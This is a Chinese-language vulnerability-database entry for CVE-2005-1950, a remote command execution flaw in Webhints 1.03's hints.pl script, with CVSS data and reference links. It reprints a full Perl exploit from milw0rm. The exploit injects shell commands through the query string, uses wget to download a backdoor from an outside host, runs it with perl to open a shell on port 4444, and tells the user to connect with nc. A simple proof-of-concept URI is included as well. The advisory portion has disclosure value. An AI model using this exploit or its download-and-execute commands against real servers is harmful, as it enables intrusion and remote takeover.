CVE-2005-1950
CVSS7.5
发布时间 :2005-06-09 00:00:00
修订时间 :2016-10-17 23:23:30
NMCOES    

[原文]hints.pl in Webhints 1.03 allows remote attackers to execute arbitrary commands via shell metacharacters in the argument.


[CNNVD]Darryl Burgdorf Webhints hints.pl脚本 远程命令执行漏洞(CNNVD-200506-083)

        Webhints 1.03的hints.pl脚本允许远程攻击者通过自变量中的shell元字符来执行任意命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1950
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1950
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200506-083
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111842893001406&w=2
(UNKNOWN)  BUGTRAQ  20050609 Webhints v1.03 Remote Command Execution
http://securitytracker.com/id?1014173
(UNKNOWN)  SECTRACK  1014173
http://www.securityfocus.com/bid/13930
(UNKNOWN)  BID  13930

- 漏洞信息

Darryl Burgdorf Webhints hints.pl脚本 远程命令执行漏洞
高危 输入验证
2005-06-09 00:00:00 2005-10-20 00:00:00
远程  
        Webhints 1.03的hints.pl脚本允许远程攻击者通过自变量中的shell元字符来执行任意命令。

- 公告与补丁

        

- 漏洞信息 (1039)

Webhints <= 1.03 Remote Command Execution Exploit (perl code) (1) (EDBID:1039)
cgi webapps
2005-06-11 Verified
0 Alpha_Programmer
N/A [点击下载]
# This exploit uses a backdoor that isn't located on this server.
# $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";
# change for your own needs. /str0ke

#!/usr/bin/perl
######################################################################################
#        T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m           #
######################################################################################
#  EXPLOIT FOR: WebHints Remote C0mmand Execution Vuln                               #
#                                                                                    #
#Expl0it By: A l p h a _ P r o g r a m m e r (Sirus-v)                               #
#Email: Alpha_Programmer@Yahoo.Com                                                   #
#                                                                                    #
#This Xpl Run a backdo0r in Server With 4444 Port.                                   #
#Advisory: http://www.securityfocus.com/archive/1/401940/30/0/threaded               #
######################################################################################
# GR33tz T0 ==>     mh_p0rtal  --  oil_Karchack  --  The-CephaleX  -- Str0ke         #
#And Iranian Security & Technical Sites:                                             #
#                                                                                    #
#         TechnoTux.Com , IranTux.Com , Iranlinux.ORG , Barnamenevis.ORG             #
#      Crouz ,  Simorgh-ev   , IHSsecurity , AlphaST , Shabgard &  GrayHatz.NeT      #
######################################################################################

use IO::Socket;

if (@ARGV < 2)
{
 print "\n==============================================\n";
 print " \n    WebHints Exploit By Alpha_Programmer \n\n";
 print "      Trap-Set Underground Hacking Team      \n\n";
 print "            Usage: <T4rg3t> <Dir>      \n\n";
 print "==============================================\n\n";
 print "Examples:\n\n";
 print "    Webhints.pl www.Host.com /cgi-bin/ \n";
 exit();
}


$serv = $ARGV[0];
$serv =~ s/http:\/\///ge;

$dir = $ARGV[1];

$cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";
$cmde2 = "cd /tmp;cp alpha.txt alpha.pl;chmod 777 alpha.pl;perl alpha.pl";

$req = "GET $dir";
$req .= "hints.pl?|$cmde| HTTP/1.0\n\n\n\n";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n";

print $sock $req;
print "\nPlease Wait ...\n\n";
sleep(3000);
close($sock);

$sock2 = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n";


$req2 = "GET $dir";
$req2 .= "hints.pl?|$cmde2| HTTP/1.0\n\n\n\n";

print $sock2 $req2;

sleep(100);

print "\n\n$$$   OK -- Now Try: Nc -v www.Site.com 4444   $$$\n";
print "$$  if This Port was Close , This mean is That , You Haven't Permission to Write in /TMP  $$\n";
print "Enjoy ;)";
### EOF ###

# milw0rm.com [2005-06-11]
		

- 漏洞信息

17287
WebHints hints.pl Arbitrary Command Execution
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-06-09 Unknow
2005-06-09 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Darryl Burgdorf Webhints Remote Command Execution Vulnerability
Input Validation Error 13930
Yes No
2005-05-09 12:00:00 2009-07-12 02:56:00
blahplok@yahoo.com is credited with the discovery of this vulnerability.

- 受影响的程序版本

Darryl Burgdorf Webhints 1.3
Colored Scripts Easy Message Board

- 漏洞讨论

Darryl Burgdorf Webhints is prone to a remote command execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

- 漏洞利用

No exploit is required.

The following proof of concept URI is available:
http://www.example.com/hints.pl?|uname|

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站